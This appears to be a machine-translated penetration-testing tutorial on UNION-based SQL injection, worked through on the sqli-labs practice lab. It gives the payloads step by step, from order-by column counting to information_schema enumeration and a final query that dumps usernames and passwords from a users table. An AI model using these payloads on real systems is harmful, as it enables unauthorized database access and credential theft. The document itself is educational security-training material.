Zhangxiaobai's road to penetration (7) -sql injection detailed operation steps -union joint query injection

UNION Joint query injection

union brief introduction
union Operators are used to merge two or more select The result set of the statement .
ps: union Inside select Statements must have the same number of columns . Columns must also have similar data types . meanwhile , Every one of them select The order of the columns in the statement must be the same .
By default ,union The operator selects different values . If duplicate values are allowed , Please use union all

union Injection conditions

1. Only the last one select Clause allows order by
2. Only the last one select Clause allows limit
3. as long as union The number of fields of several connected queries is the same, and there is no problem in the data type conversion of columns , You can query the results
4. The injection point page has echo

union Injection process

Here we use sqli-labs To demonstrate union The operation process of joint query vulnerability .

1.order by Determine the number of columns

order by Function is used to sort data in a column
for example order by 1 Sort the data in the first column of the database table from small to large
url Add input to

' order by 3--+

' Used to isolate strings ,- -+ Subsequent statements used to comment this line

2.
Try again and again after step , We finally found that the table had three columns , Then let's watch the page return , Select the location where the data can be displayed , Proceed to the next injection

url Modify and add input

 id=100' union select 1,2,3--+

because union By default, the query only displays the field values of the first column , So we put union The previous query statement was intentionally set to 100 Make the query error and display the value of the second segment , So we can find the location where the data is displayed .

3. Read library information

We read the database information by replacing the position of the above value

take url Of the statement 3 Replace with database()
To read the current library information
You can also query all the library names with a query statement at this location
replace content

(select schema_name from information_schema.schemata limit 0,1)

limit The function is to limit the output , Because the page can only display one row of data , So we show the data in the first row , If you want to display the data of the second row , take 0 This is 1 that will do , Modify the data in turn to get all database names . Yes SQL If you are not familiar with the sentence, you can copy it and use it directly
, This is not affected at the beginning of learning .
4. Reading table information
Again , Replace with query all table information of the library in this location

select table_name from information_schema.tables where table_schema=database() limit 0,1

The other operations are the same as those in step , To find out all table names

5. Read column information

Same position replacement

Select column_name from information_schema.columns where table_name='users' limit 1,1
Select column_name from information_schema.columns where table_name='users' limit 2,1

After replacement, we get two key field names username,password
6. Query data
ditto , Replace data

Select group_concat(username,':',password) from users

group_concat Functions here are explained in detail , If you are interested, please have a look at concat Explanation of series functions